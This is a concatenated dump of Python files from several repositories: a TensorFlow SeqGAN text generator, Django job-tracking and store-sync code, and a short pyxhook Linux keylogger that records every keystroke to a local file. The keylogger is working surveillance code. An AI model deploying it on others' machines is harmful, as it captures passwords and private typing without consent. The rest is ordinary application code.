self.type_index = tf.placeholder(dtype=tf.int32, shape=[self.batch_size])
# x 에 type vector 추가
x_type_index = tf.reshape(tf.concat([self.type_index] * self.sequence_length, axis=0),
[self.batch_size, self.sequence_length])
self.x_type_onehot = tf.one_hot(x_type_index, self.type_size)
# start_token 에 type vector 추가
self.type_onehot = tf.one_hot(self.type_index, self.type_size)
# processed for batch
with tf.device("/cpu:0"):
embedding_input = tf.nn.embedding_lookup(self.g_embeddings, self.x)
embedding_input = tf.concat([embedding_input, self.x_type_onehot], axis=2)
self.processed_x = tf.transpose(embedding_input, perm=[1, 0, 2]) # seq_length x batch_size x emb_dim
# Initial states
self.h0 = tf.zeros([self.batch_size, self.hidden_dim])
self.h0 = tf.stack([self.h0, self.h0])
gen_o = tensor_array_ops.TensorArray(dtype=tf.float32, size=self.sequence_length,
dynamic_size=False, infer_shape=True)
gen_x = tensor_array_ops.TensorArray(dtype=tf.int32, size=self.sequence_length,
dynamic_size=False, infer_shape=True)
def _g_recurrence(i, x_t, h_tm1, gen_o, gen_x):
h_t = self.g_recurrent_unit(x_t, h_tm1) # hidden_memory_tuple
o_t = self.g_output_unit(h_t) # batch x vocab , logits not prob
log_prob = tf.log(tf.nn.softmax(o_t))
next_token = tf.cast(tf.reshape(tf.multinomial(log_prob, 1), [self.batch_size]), tf.int32)
x_tp1 = tf.concat([tf.nn.embedding_lookup(self.g_embeddings, next_token), self.type_onehot],
axis=1) # batch x emb_dim
gen_o = gen_o.write(i, tf.reduce_sum(tf.multiply(tf.one_hot(next_token, self.num_emb, 1.0, 0.0),
tf.nn.softmax(o_t)), 1)) # [batch_size] , prob
gen_x = gen_x.write(i, next_token) # indices, batch_size
return i + 1, x_tp1, h_t, gen_o, gen_x
_, _, _, self.gen_o, self.gen_x = control_flow_ops.while_loop(
cond=lambda i, _1, _2, _3, _4: i < self.sequence_length,
body=_g_recurrence,
loop_vars=(tf.constant(0, dtype=tf.int32),
tf.concat([tf.nn.embedding_lookup(self.g_embeddings, self.start_token), self.type_onehot],
axis=1),
self.h0, gen_o, gen_x))
self.gen_x = self.gen_x.stack() # seq_length x batch_size
self.gen_x = tf.transpose(self.gen_x, perm=[1, 0]) # batch_size x seq_length
# supervised pretraining for generator
g_predictions = tensor_array_ops.TensorArray(
dtype=tf.float32, size=self.sequence_length,
dynamic_size=False, infer_shape=True)
ta_emb_x = tensor_array_ops.TensorArray(
dtype=tf.float32, size=self.sequence_length)
ta_emb_x = ta_emb_x.unstack(self.processed_x)
def _pretrain_recurrence(i, x_t, h_tm1, g_predictions):
h_t = self.g_recurrent_unit(x_t, h_tm1)
o_t = self.g_output_unit(h_t)
g_predictions = g_predictions.write(i, tf.nn.softmax(o_t)) # batch x vocab_size
x_tp1 = ta_emb_x.read(i)
return i + 1, x_tp1, h_t, g_predictions
_, _, _, self.g_predictions = control_flow_ops.while_loop(
cond=lambda i, _1, _2, _3: i < self.sequence_length,
body=_pretrain_recurrence,
loop_vars=(tf.constant(0, dtype=tf.int32),
tf.concat([tf.nn.embedding_lookup(self.g_embeddings, self.start_token), self.type_onehot],
axis=1),
self.h0, g_predictions))
self.g_predictions = tf.transpose(self.g_predictions.stack(), perm=[1, 0, 2]) # batch_size x seq_length x vocab_size
# pretraining loss
self.pretrain_loss = -tf.reduce_sum(
tf.one_hot(tf.to_int32(tf.reshape(self.x, [-1])), self.num_emb, 1.0, 0.0) * tf.log(
tf.clip_by_value(tf.reshape(self.g_predictions, [-1, self.num_emb]), 1e-20, 1.0)
)
) / (self.sequence_length * self.batch_size)
# training updates
pretrain_opt = self.g_optimizer(self.learning_rate)
self.pretrain_grad, _ = tf.clip_by_global_norm(tf.gradients(self.pretrain_loss, self.g_params), self.grad_clip)
self.pretrain_updates = pretrain_opt.apply_gradients(zip(self.pretrain_grad, self.g_params))
#######################################################################################################
# Unsupervised Training
#######################################################################################################
self.g_loss = -tf.reduce_sum(
tf.reduce_sum(
tf.one_hot(tf.to_int32(tf.reshape(self.x, [-1])), self.num_emb, 1.0, 0.0) * tf.log(
tf.clip_by_value(tf.reshape(self.g_predictions, [-1, self.num_emb]), 1e-20, 1.0)
), 1) * tf.reshape(self.rewards, [-1])
)
g_opt = self.g_optimizer(self.learning_rate)
self.g_grad, _ = tf.clip_by_global_norm(tf.gradients(self.g_loss, self.g_params), self.grad_clip)
self.g_updates = g_opt.apply_gradients(zip(self.g_grad, self.g_params))
def generate(self, sess, word_embedding_matrix, type_idx):
outputs = sess.run(self.gen_x, feed_dict={self.word_embedding_matrix: word_embedding_matrix,
self.type_index: type_idx})
return outputs
def pretrain_step(self, sess, x, word_embedding_matrix, type_idx):
outputs = sess.run([self.pretrain_updates, self.pretrain_loss],
feed_dict={self.x: x, self.word_embedding_matrix: word_embedding_matrix,
self.type_index: type_idx})
return outputs
def init_matrix(self, shape):
return tf.random_normal(shape, stddev=0.1)
def init_vector(self, shape):
return tf.zeros(shape)
def create_recurrent_unit(self, params):
# Weights and Bias for input and hidden tensor
self.Wi = tf.Variable(self.init_matrix([self.emb_dim + self.type_size, self.hidden_dim]))
self.Ui = tf.Variable(self.init_matrix([self.hidden_dim, self.hidden_dim]))
self.bi = tf.Variable(self.init_matrix([self.hidden_dim]))
self.Wf = tf.Variable(self.init_matrix([self.emb_dim + self.type_size, self.hidden_dim]))
self.Uf = tf.Variable(self.init_matrix([self.hidden_dim, self.hidden_dim]))
self.bf = tf.Variable(self.init_matrix([self.hidden_dim]))
self.Wog = tf.Variable(self.init_matrix([self.emb_dim + self.type_size, self.hidden_dim]))
self.Uog = tf.Variable(self.init_matrix([self.hidden_dim, self.hidden_dim]))
self.bog = tf.Variable(self.init_matrix([self.hidden_dim]))
self.Wc = tf.Variable(self.init_matrix([self.emb_dim + self.type_size, self.hidden_dim]))
self.Uc = tf.Variable(self.init_matrix([self.hidden_dim, self.hidden_dim]))
self.bc = tf.Variable(self.init_matrix([self.hidden_dim]))
params.extend([
self.Wi, self.Ui, self.bi,
self.Wf, self.Uf, self.bf,
self.Wog, self.Uog, self.bog,
self.Wc, self.Uc, self.bc])
def unit(x, hidden_memory_tm1):
previous_hidden_state, c_prev = tf.unstack(hidden_memory_tm1)
# Input Gate
i = tf.sigmoid(
tf.matmul(x, self.Wi) +
tf.matmul(previous_hidden_state, self.Ui) + self.bi
)
# Forget Gate
f = tf.sigmoid(
tf.matmul(x, self.Wf) +
tf.matmul(previous_hidden_state, self.Uf) + self.bf
)
# Output Gate
o = tf.sigmoid(
tf.matmul(x, self.Wog) +
tf.matmul(previous_hidden_state, self.Uog) + self.bog
)
# New Memory Cell
c_ = tf.nn.tanh(
tf.matmul(x, self.Wc) +
tf.matmul(previous_hidden_state, self.Uc) + self.bc
)
# Final Memory cell
c = f * c_prev + i * c_
# Current Hidden state
current_hidden_state = o * tf.nn.tanh(c)
return tf.stack([current_hidden_state, c])
return unit
def create_output_unit(self, params):
self.Wo = tf.Variable(self.init_matrix([self.hidden_dim, self.num_emb]))
self.bo = tf.Variable(self.init_matrix([self.num_emb]))
params.extend([self.Wo, self.bo])
def unit(hidden_memory_tuple):
hidden_state, c_prev = tf.unstack(hidden_memory_tuple)
# hidden_state : batch x hidden_dim
logits = tf.matmul(hidden_state, self.Wo) + self.bo
# output = tf.nn.softmax(logits)
return logits
return unit
def g_optimizer(self, *args, **kwargs):
return tf.train.AdamOptimizer(*args, **kwargs)
```
#### File: pk_story/3_conditional_seqgan/preprocess_data.py
```python
import pickle
def _save_pickle(path, data):
# save pkl
f = open(path, 'wb')
pickle.dump(data, f)
f.close()
def create_sequence(seq_length, type_dict):
type_stories = list()
for pk_type in type_dict.keys():
sentences = list()
for sent in type_dict[pk_type]:
sentences.append(sent)
type_stories.append(sentences)
data = list()
type_data = dict()
for sent in type_stories:
type_story = list()
# 문장 개수만큼 for 문
for i in range(len(sent)):
seq_data = list()
# seq_data 개수가 seq_length가 될때 까지
while True:
flag = 0
for word in sent[i]:
if seq_length <= len(seq_data):
flag = 1
break
seq_data.append(word)
if flag == 1:
break
i += 1
if i >= len(sent):
i -= 1
while seq_length > len(seq_data):
seq_data.append(('UNK', ''))
data.append(seq_data)
type_story.append(seq_data)
type_data[len(type_data)] = type_story
_save_pickle("./data/2_pk_preprocessed_data.pkl", data)
_save_pickle("./data/2_pk_pre_type_data.pkl", type_data)
f = open('./data/2_pk_preprocessed_data.txt', 'w')
for tokens in data:
for word in tokens:
word = str(word) + ' '
f.write(word)
f.write('\n')
f.close()
def data_to_index(datadict, pos2idx):
idx_dict = dict()
for key in datadict.keys():
idx_dataset = list()
for sent in datadict[key]:
idx_sentence = list()
for word in sent:
if word[0] not in list(pos2idx.keys()):
print(word[0])
idx_sentence.append(pos2idx['UNK'])
continue
idx_sentence.append(pos2idx[word[0]])
idx_dataset.append(idx_sentence)
idx_dict[len(idx_dict)] = idx_dataset
_save_pickle("./data/3_pk_type_data_index.pkl", idx_dict)
# save pk_data_index.txt
f = open('./data/3_pk_type_data_index.txt', 'w')
for key in idx_dict.keys():
f.write("[{}]".format(str(key)))
f.write('\n')
for idx_sent in idx_dict[key]:
for word in idx_sent:
word = str(word) + ' '
f.write(word)
f.write('\n')
f.close()
if __name__ == "__main__":
DATA_PATH = "./data/"
seq_length = 30 # max 52
# load dictionary that changes type to sentences (pkl)
a = open('./data/type_dict_khkim.pickle', 'rb')
type_dict = pickle.load(a)
print(type_dict)
print("Create Sequence in a length of seq_length...")
create_sequence(seq_length, type_dict)
print("Complete Creating sequence !!")
# load after dataset
a = open("./data/2_pk_pre_type_data.pkl", 'rb')
datadict = pickle.load(a)
# load pos to index
a = open("./data/pk_pos2idx.pkl", 'rb')
pos2idx = pickle.load(a)
print("Replace Sequence to Index...")
data_to_index(datadict, pos2idx)
print("Complete Creating sequence to index !!")
``` |
{
"source": "5597/-Linux-Keylogger",
"score": 2
} |
#### File: -Linux-Keylogger/[linux] keylogger/pylogger.py
```python
import pyxhook
keyfile='/home/pylay/[linux] keylogger/file.log'
#change this to your log file's path
def OnKeyPress(event):
fob=open(keyfile,'a')
fob.write(event.Key)
fob.write('\n')
if event.Ascii==96: #96 = ascii (`)
fob.close()
new_hook.cancel()
new_hook=pyxhook.HookManager()
new_hook.KeyDown=OnKeyPress
new_hook.HookKeyboard()
new_hook.start()
``` |
{
"source": "559Labs/JobTrak",
"score": 3
} |
#### File: core/templatetags/mmg.py
```python
from django import template
import markdown
register = template.Library()
@register.filter
def markdownify(text):
# safe_mode governs how the function handles raw HTML
return markdown.markdown(text, safe_mode='escape')
@register.filter
def tag_to_list(text):
# Converts a comma-separated string to a list.
items = text.split(',')
rv = "<ul>"
for i in items:
rv += "<li>{}</li>".format(i.strip(" "))
rv += "</ul>"
return rv
```
#### File: jobtrak/links/signals.py
```python
from external_urls.signals import external_click
from django.dispatch import receiver
from django.utils import timezone
from mmg.jobtrak.links.models import *
@receiver(external_click)
def external_click_fallback(sender, url, ip, **kwargs):
link = JobBoard.objects.get(url=url)
link.last_click = timezone.now()
link.save()
```
#### File: jobtrak/util/tools.py
```python
from __future__ import print_function
import os
from django.db import models
from django.apps import apps
from pygithub3 import Github
import urllib, operator, time
from JobTrak import settings
from mmg.jobtrak import *
# mmg.jobtrak.util.tools
class Tool():
# X._meta.object_name gives the object name
# X._meta.verbose_name gives the human readable name
# X._meta.get_all_field_names() - all the fields
# X._meta.get_internal_type() - type of field
# X._meta.attname - attribute name
# X._meta.name - name can retrieve by (if the two match, it's a local field, otherwise it's a related field)
def print_models(self):
for app in apps.get_apps():
if str(app.__package__).startswith('mmg.jobtrak'):
print(" ".join(["App:", app.__package__]))
for model in apps.get_models(app):
print(" ".join(["\tModel:", model._meta.object_name]))
for field in model._meta.fields:
print(" ".join(["\t\tField:", field.name, field.attname, field.get_internal_type()]))
def generate_model_table_md(self, model):
rv = "| Field | Type |\n| :---- | :--: |\n"
for field in model._meta.fields:
rv += "| **" + field.name + "**"
if (field.name != field.attname): # Foreign Key
rv += " (FK)"
rv += " | " + field.get_internal_type() + " |\n"
return rv
def get_rev_date(self):
"""Generates the date and time footer, displaying when the document was generated for the wiki"""
return ''.join(["***\nUpdated: ", time.strftime("%Y-%m-%d %H:%M")])
def generate_model_docs(self):
WIKI_DIR = os.path.dirname(os.path.dirname(settings.BASE_DIR)) + "/JobTrak.wiki/"
for app in apps.get_apps():
if str(app.__package__).startswith('mmg.jobtrak'):
print("".join(["--> Processing ",str(app.__package__),"..."]))
a_filename =''.join([
"App:-",
app.__package__.replace('.','-').replace('mmg-jobtrak-',''),
".md"
])
a_content = "### App: " + app.__package__.replace('mmg.jobtrak.','') + "\n"
a_content += "**Package**: " + str(app.__package__) + "\n\n"
if len(apps.get_models(app)) > 0:
a_content += "| Model |\n| ----- |\n"
for model in apps.get_models(app):
m_filename=''.join([
"Model:-",
str(app.__package__).replace(".","-").replace('mmg-jobtrak-',''),
"-",
model._meta.object_name,
".md"
])
a_content += "| [[" + model._meta.object_name + "|" + m_filename + "]] |\n"
m_content = "### Model: " + app.__package__.replace('mmg.jobtrak.','') + "\n"
m_content += "**Package**: " + app.__package__ + "\n"
m_content += "[[Back to App|" + a_filename + "]]\n\n"
m_content += self.generate_model_table_md(model)
m_content += "\n\n" + self.get_rev_date()
print(" ".join([" - Writing file:",m_filename]))
f = open(WIKI_DIR + m_filename, 'w')
f.write(m_content)
f.close()
else: # No models.
a_content += "TODO: There are presently no models in this app."
a_content += "\n\n" + self.get_rev_date()
print(" ".join([" - Writing file:", a_filename]))
f = open(WIKI_DIR + a_filename, 'w')
f.write(a_content)
f.close()
else:
print("".join(["--> Skipping ",str(app.__package__),"..."]))
```
#### File: code/scripts/generate_messages.py
```python
from __future__ import print_function
#from django.db import models
#from django.apps import apps
from subprocess import call
#from pygithub3 import Github
#import urllib, operator, time
#from mmg.jobtrak import *
import os
from JobTrak import settings
class GenerateMessages:
APPS_DIR = os.path.join(settings.BASE_DIR,'mmg','jobtrak')
MANAGE_APP = os.path.join(settings.BASE_DIR,"manage.py")
TX_CONFIG = os.path.join(os.path.dirname(settings.BASE_DIR),".tx","config")
def run_command(self,cmd,msg_ok="OK!",msg_err="An error happened."):
print(self.get_header("Generating Global Project Message Files"))
os.chdir(settings.BASE_DIR)
cmd = ['python ' + self.MANAGE_APP + " makemessages -a --no-wrap"]
try:
retcode = call(cmd, shell=True)
if retcode < 0:
print(msg_err,"Error Code:", -retcode)
else:
print(msg_ok)
except OSError as e:
print(msg_err,"Execution Failed:", e)
def get_header(self,title):
rv = ("\n"+title+"\n")
val = "="
rv += (val * ((len(title)/len(val))+1))[:len(title)]
return rv
def make_messages(self):
print(self.get_header("Generating Global Project Message Files"))
os.chdir(settings.BASE_DIR)
cmd = ['python ' + self.MANAGE_APP + " makemessages -a --no-wrap"]
try:
retcode = call(cmd, shell=True)
if retcode < 0:
print("An error happened. Error Code:", -retcode)
else:
print("OK!")
except OSError as e:
print("Execution failed:", e)
print(self.get_header("--> Generating Messages by App"))
apps_list = os.listdir(self.APPS_DIR)
for app in apps_list:
app_path = os.path.join(self.APPS_DIR,app)
if os.path.isdir(app_path):
print("* Generating messages for the",app,"app...")
locale_path = os.path.join(app_path, "locale")
if(os.path.exists(locale_path)):
os.chdir(app_path)
cmd = ['python ' + self.MANAGE_APP + " makemessages -a --no-wrap"]
try:
retcode = call(cmd, shell=True)
if retcode < 0:
print("An error happened. Error Code:", -retcode)
else:
print("OK!")
except OSError as e:
print("Execution failed:", e)
else:
print("DIRECTORY DOESN'T EXIST", os.path.join(app_path,"locale"))
def pushpull_trans(self):
print(self.get_header("Interacting with Transifex"))
self.run_command(
['tx push-s'],
msg_ok="Successfully pussed new tokens to Transifex.")
self.run_command(
['tx pull -a'],
msg_ok="Successfully pulled new translations from Transifex."
)
def compile_messages(self):
print(self.get_header("Compiling Messages"))
self.run_command(
['python ' + self.MANAGE_APP + " compilemessages"],
msg_ok="Messages all compiled. Be sure to check in the .po language files to git.")
def run():
g=GenerateMessages()
if os.path.isfile(g.TX_CONFIG):
g.make_messages()
g.pushpull_trans()
g.compile_messages()
else:
print("--> Skipping language file management, since it's not configured.")
print(" You need the Transifex client configured. Visit this Web site")
print(" for more info: http://docs.transifex.com/developer/client/")
# echo " - Pushing source language to Transifex..."
# tx push -s
# echo " - Pulling translated languages from Transifex..."
# tx pull -a
# echo " - Compiling language files into .mo archives..."
#
# fi
#
#
# def run():
# g=GenerateMessages()
# g.make_messages_by_app()
#
# g.output_instructions()
``` |
{
"source": "559Labs/printaura-api-sync",
"score": 2
} |
#### File: src/business/helper_backend.py
```python
from django_tables2 import SingleTableView
from django.views.generic import DetailView, ListView, UpdateView, CreateView
from django.contrib import messages
class commonListView(SingleTableView):
model = None
table_class = None
object_name = None
object_icon = None
template_name = "business/object_list.html"
action_new = None
action_list = None
active_app = None
active_apptitle = None
table_pagination = {'per_page': 15}
def get_context_data(self, **kwargs):
context = super(commonListView, self).get_context_data(**kwargs)
context['active_app'] = self.active_app
context['active_apptitle'] = self.active_apptitle
context['object_icon'] = self.object_icon
context['object_name'] = self.object_name
if self.action_new:
context['action_new'] = self.action_new
if self.action_list:
context['action_list'] = self.action_list
return context
class commonCreateView(CreateView):
model = None
form_class = None
object_name = None
object_icon = None
template_name = "business/object_form.html"
success_url = None
action_list = None
active_app = None
active_apptitle = None
def get_context_data(self, **kwargs):
context = super(commonCreateView, self).get_context_data(**kwargs)
context['mode'] = "create"
context['active_app'] = self.active_app
context['active_apptitle'] = self.active_apptitle
context['object_icon'] = self.object_icon
context['object_name'] = self.object_name
context['action_list'] = self.action_list
return context
class commonUpdateView(UpdateView):
model = None
form_class = None
object_name = None
object_icon = None
template_name = "business/object_form.html"
success_url = None
action_list = None
active_app = None
active_apptitle = None
def get_context_data(self, **kwargs):
context = super(commonUpdateView, self).get_context_data(**kwargs)
context['mode'] = "update"
context['active_app'] = self.active_app
context['active_apptitle'] = self.active_apptitle
context['object_icon'] = self.object_icon
context['object_name'] = self.object_name
context['action_list'] = self.action_list
return context
def cleanValue(value, default=""):
return value if value else default
# class SuccessMessageMixin:
# """
# Add a success message on successful form submission.
# """
# success_message = ''
#
# def form_valid(self, form):
# response = super().form_valid(form)
# success_message = self.get_success_message(form.cleaned_data)
# if success_message:
# messages.success(self.request, success_message)
# return response
#
# def get_success_message(self, cleaned_data):
# return self.success_message % cleaned_data
#
#
# class MessageMixin:
# """
# Add a message on next screen
# """
# message = ''
#
```
#### File: src/business/models.py
```python
from django.conf import settings
from fractions import Fraction
from django.contrib.contenttypes.fields import GenericForeignKey
from django.contrib.contenttypes.models import ContentType
from django.contrib.auth import get_user_model
from django.contrib.auth import models as auth_models
from django.core.urlresolvers import reverse
from django.db.models import *
from django.db import models as models
from django.utils.translation import ugettext_lazy as _
from django_extensions.db import fields as extension_fields
from django_extensions.db.fields import AutoSlugField
from timezone_field import TimeZoneField
import uuid
from decimal import *
from pyPrintful import pyPrintful
from django.core.exceptions import ObjectDoesNotExist
from business.helper_backend import *
from storemanager.logger import *
logger = StyleAdapter(logging.getLogger("project"))
class commonBusinessModel(models.Model):
id = UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
date_added = DateTimeField(auto_now_add=True, verbose_name=_("Added"))
date_updated = DateTimeField(auto_now=True, verbose_name=_("Updated"))
class Meta:
abstract = True
# Primarily Store App Related
class bzBrand(commonBusinessModel):
# Fields
code = CharField(_("Code"), max_length=2)
name = CharField(_("Name"), max_length=255,
default="", blank=True, null=True)
# Relationship Fields
vendor = ForeignKey('business.pfStore', blank=True, null=True, )
outlet = ForeignKey('business.wooStore', blank=True, null=True,)
class Meta:
ordering = ('code',)
verbose_name = _("Brand")
verbose_name_plural = _("Brands")
def __str__(self):
if self.code and self.name:
return "{} - {}".format(self.code, self.name)
elif self.name:
return "{}".format(self.name)
return _("Unknown Brand")
def get_absolute_url(self):
return reverse('business:app_store_brand_detail', args=(self.pk,))
def get_update_url(self):
return reverse('business:app_store_brand_update', args=(self.pk,))
class pfStore(commonBusinessModel):
# Fields
code = CharField(_("Code"), max_length=50,
default="", blank=True, null=True)
name = CharField(_("Name"), max_length=255,
default="", blank=True, null=True)
pid = IntegerField(_("Printful ID"), default=0)
website = CharField(_("Website"), max_length=255,
default="", blank=True, null=True)
created = CharField(_("Created"), max_length=255,
default="", blank=True, null=True)
key = CharField(_("API Key"), max_length=64, default="", blank=True)
return_address = ForeignKey("business.pfAddress", verbose_name=_(
"Return Address"), related_name="returnaddress", blank=True, null=True)
billing_address = ForeignKey("business.pfAddress", verbose_name=_(
"Billing Address"), related_name="billingaddress", blank=True, null=True)
payment_type = CharField(_("Payment Card Type"),
max_length=64, default="", blank=True, null=True)
payment_number_mask = CharField(
_("Payment Card Type"), max_length=64, default="", blank=True, null=True)
payment_expires = CharField(
_("Payment Card Type"), max_length=64, default="", blank=True, null=True)
packingslip_email = EmailField(
_("Packing Slip Email"), default="", blank=True, null=True)
packingslip_phone = CharField(
_("Packing Slip Phone"), max_length=64, default="", blank=True, null=True)
packingslip_message = CharField(
_("Packing Slip Message"), max_length=255, default="", blank=True, null=True)
class Meta:
ordering = ('-created',)
verbose_name = _("Printful Store")
verbose_name_plural = _("Printful Stores")
def __str__(self):
rv = []
if self.code and self.name:
return "{} - {}".format(self.code, self.name)
elif self.code:
return "{}".format(self.code)
return _("Unknown Store")
def get_absolute_url(self):
return reverse('business:app_store_pf_detail', args=(self.pk,))
def get_update_url(self):
return reverse('business:app_store_pf_update', args=(self.pk,))
def has_auth(self):
return True if self.key else False
has_auth.short_description = _("Auth?")
has_auth.boolean = True
def save(self, *args, **kwargs):
logger.debug('Method: pfStore.save() Called')
if self.pid == 0:
if pfCountry.objects.all().count() == 0:
pfCountry.api_pull(key=self.key)
self.api_pull()
self.api_push()
self.api_pull()
super(pfStore, self).save(*args, **kwargs)
@staticmethod
def get_store(store=None):
"""
Gets a 'default' Printful store, generally for use with the Printful API
methods on other related objects. If a store is provided, then it is
validated and returned. Otherwise, this method will attempt to grab the
first Printful store object in the database and return that.
If no stores are in the database, then this method will raise an exception.
The wrapping method will need to catch this and respond appropriately.
:param store: Optional. pfStore object. Will validate that it is a valid
pfStore object and return it back.
"""
if type(store) is pfStore and store.has_auth():
return store
else:
store = pfStore.objects.exclude(
key__isnull=True).exclude(key__exact='').first()
if store:
return store
raise ObjectDoesNotExist(
"Either provide a store object or add at least one pfStore with an API key to the database.")
def api_pull(self):
"""
Update current store with data from Printful API.
"""
if not self.has_auth():
raise Exception("This store is missing the API Key.")
# TODO Handle states/countries lookup Exceptions
api = pyPrintful(key=self.key)
sData = api.get_store_info()
print(sData)
print(api._store['last_response_raw'])
self.website = sData['website']
self.name = sData['name']
self.pid = sData['id']
self.created = sData['created']
self.packingslip_phone = sData['packing_slip']['phone']
self.packingslip_email = sData['packing_slip']['email']
self.packingslip_message = sData['packing_slip']['message']
self.payment_type = sData['payment_card']['type']
self.payment_number_mask = sData['payment_card']['number_mask']
self.payment_expires = sData['payment_card']['expires']
if sData['billing_address']:
_state = pfState.objects.get(
code=sData['billing_address']['state_code'])
_country = pfCountry.objects.get(
code=sData['billing_address']['country_code'])
self.billing_address, created = pfAddress.objects.update_or_create(
name=sData['billing_address']['name'],
company=sData['billing_address']['company'],
address1=sData['billing_address']['address1'],
address2=sData['billing_address']['address2'],
city=sData['billing_address']['city'],
zip=sData['billing_address']['zip'],
phone=sData['billing_address']['phone'],
email=sData['billing_address']['email'],
state=_state,
country=_country,
defaults={}
)
if sData['return_address']:
_state = pfState.objects.get(
code=sData['return_address']['state_code'])
_country = pfCountry.objects.get(
code=sData['return_address']['country_code'])
self.return_address, created = pfAddress.objects.update_or_create(
name=sData['return_address']['name'],
company=sData['return_address']['company'],
address1=sData['return_address']['address1'],
address2=sData['return_address']['address2'],
city=sData['return_address']['city'],
zip=sData['return_address']['zip'],
phone=sData['return_address']['phone'],
email=sData['return_address']['email'],
state=_state,
country=_country,
defaults={}
)
def api_push(self):
"""
Pushes the only data available to update via the API: packing slip info.
"""
if not self.has_auth():
raise Exception("This store is missing the API Key.")
data = {
'email': self.packingslip_email,
'phone': self.packingslip_phone,
'message': self.packingslip_message,
}
api = pyPrintful(key=self.key)
api.put_store_packingslip(data)
class wooStore(commonBusinessModel):
# Fields
code = CharField(_("Code"), max_length=2, default="", blank=True, null=True,
help_text=_("Generally, a two-character uppercase code. Used in SKUs."))
base_url = URLField(_("Base URL"), default="", blank=True, null=True, help_text=_(
"Include the schema and FQDN only (e.g., 'https://example.com'). No trailing slash."))
consumer_key = CharField(
_("Consumer Key"), max_length=64, blank=True, null=True)
consumer_secret = CharField(
_("Consumer Secret"), max_length=64, blank=True, null=True)
timezone = TimeZoneField(default='America/New_York')
verify_ssl = BooleanField(_("Verify SSL?"), default=True, help_text=_(
"Uncheck this if you are using a self-signed SSL certificate to disable ssl verification."))
class Meta:
ordering = ('code',)
verbose_name = _("WP Store")
verbose_name_plural = _("WP Stores")
def __str__(self):
rv = []
if self.code and self.base_url:
return "{} - {}".format(self.code, self.base_url)
elif self.code:
return "{}".format(self.code)
return _("Unknown Store")
def get_absolute_url(self):
return reverse('business:app_store_wp_detail', args=(self.pk,))
def get_update_url(self):
return reverse('business:app_store_wp_update', args=(self.pk,))
# Primarily Creative App Related
class bzCreativeCollection(commonBusinessModel):
# Fields
code = CharField(_("Code"), max_length=3)
name = CharField(_("Name"), max_length=255,
default="", blank=True, null=True)
# Relationship Fields
bzbrand = ForeignKey('business.bzBrand', verbose_name=_("Brand"))
class Meta:
ordering = ('code',)
verbose_name = _("Creative Collection")
verbose_name_plural = _("Creative Collections")
def __str__(self):
if self.code and self.name:
return "{} - {}".format(self.code, self.name)
elif self.name:
return "{}".format(self.name)
return _("Unknown Collection")
def get_absolute_url(self):
return reverse(
'business:business_bzcreativecollection_detail', args=(self.pk,))
def get_update_url(self):
return reverse(
'business:business_bzcreativecollection_update', args=(self.pk,))
def get_designs(self):
return bzCreativeDesign.objects.filter(bzcreativecollection=self)
get_designs.short_description = _("Designs")
def num_designs(self):
return self.get_designs().count()
num_designs.short_description = _("Designs")
def get_layouts(self):
return bzCreativeLayout.objects.filter(bzcreativecollection=self)
get_designs.short_description = _("Layouts")
def num_layouts(self):
return self.get_layouts().count()
num_layouts.short_description = _("Layouts")
class bzCreativeDesign(commonBusinessModel):
# Fields
code = CharField(_("Code"), max_length=2)
name = CharField(_("Name"), max_length=255,
default="", blank=True, null=True)
# Relationship Fields
bzcreativecollection = ForeignKey(
'business.bzCreativeCollection', verbose_name=_("Collection"))
class Meta:
ordering = ('bzcreativecollection__code', 'code',)
verbose_name = _("Creative Design")
verbose_name_plural = _("Creative Designs")
def __str__(self):
rv = []
if self.bzcreativecollection:
if self.bzcreativecollection.code:
rv.append(self.bzcreativecollection.code + "-")
if self.code:
rv.append(self.code)
if self.bzcreativecollection:
if self.bzcreativecollection.code:
rv.append(" / " + self.bzcreativecollection.name)
if self.name:
rv.append(" / " + self.name)
if rv:
return "".join(rv)
return _("Unknown Design")
def get_absolute_url(self):
return reverse('business:business_bzcreativedesign_detail',
args=(self.pk,))
def get_update_url(self):
return reverse('business:business_bzcreativedesign_update',
args=(self.pk,))
def get_products(self):
return bzProduct.objects.filter(bzDesign=self)
get_products.short_description = _("Products")
def num_products(self):
return self.get_products().count()
num_products.short_description = _("Products")
class bzCreativeLayout(commonBusinessModel):
# Fields
code = CharField(_("Code"), max_length=2)
name = CharField(_("Name"), max_length=255,
default="", blank=True, null=True)
# Relationship Fields
bzcreativecollection = ForeignKey(
'business.bzCreativeCollection', verbose_name=_("Collection"))
class Meta:
ordering = ('bzcreativecollection__code', 'code',)
verbose_name = _("Creative Layout")
verbose_name_plural = _("Creative Layouts")
def __str__(self):
if self.code and self.name:
return "{} - {}".format(self.code, self.name)
elif self.name:
return "{}".format(self.name)
return _("Unknown Design")
def get_absolute_url(self):
return reverse('business:business_bzcreativelayout_detail',
args=(self.pk,))
def get_update_url(self):
return reverse('business:business_bzcreativelayout_update',
args=(self.pk,))
def get_products(self):
return bzProduct.objects.filter(bzLayout=self)
get_products.short_description = _("Products")
def num_products(self):
return self.get_products().count()
num_products.short_description = _("Products")
class bzCreativeRendering(commonBusinessModel):
# Fields
# Relationship Fields
bzcreativedesign = ForeignKey(
'business.bzCreativeDesign', verbose_name=_("Design"))
bzcreativelayout = ForeignKey(
'business.bzCreativeLayout', verbose_name=_("Layout"))
class Meta:
ordering = ('bzcreativedesign__code', 'bzcreativelayout__code',)
verbose_name = _("Creative Rendering")
verbose_name_plural = _("Creative Renderings")
def __str__(self):
if self.bzcreativedesign and self.bzcreativelayout:
return "{} - {}".format(self.bzcreativedesign.code,
self.bzcreativelayout.code)
return _("Unknown Rendering")
def get_absolute_url(self):
return reverse('business:business_bzcreativerendering_detail',
args=(self.pk,))
def get_update_url(self):
return reverse('business:business_bzcreativerendering_update',
args=(self.pk,))
class bzProduct(commonBusinessModel):
STATUS_DRAFT = "draft"
STATUS_PUBLIC = "public"
STATUS_CHOICES = (
(STATUS_DRAFT, "Draft"),
(STATUS_PUBLIC, "Public"),
)
# Fields
code = CharField(_("Code"), max_length=64,
default="", blank=True, null=True)
name = CharField(_("Name"), max_length=255,
default="", blank=True, null=True)
status = CharField(_("Status"), max_length=32,
default=STATUS_DRAFT, choices=STATUS_CHOICES)
# Relationship Fields
bzDesign = ForeignKey('business.bzCreativeDesign',
verbose_name=_("Design"))
bzLayout = ForeignKey('business.bzCreativeLayout',
verbose_name=_("Layout"), null=True, blank=True)
pfProduct = ForeignKey('business.pfCatalogProduct',
verbose_name=_("Vendor Product"),
blank=True, null=True, )
wooProduct = ForeignKey('business.wooProduct',
verbose_name=_("Outlet Product"),
blank=True, null=True, )
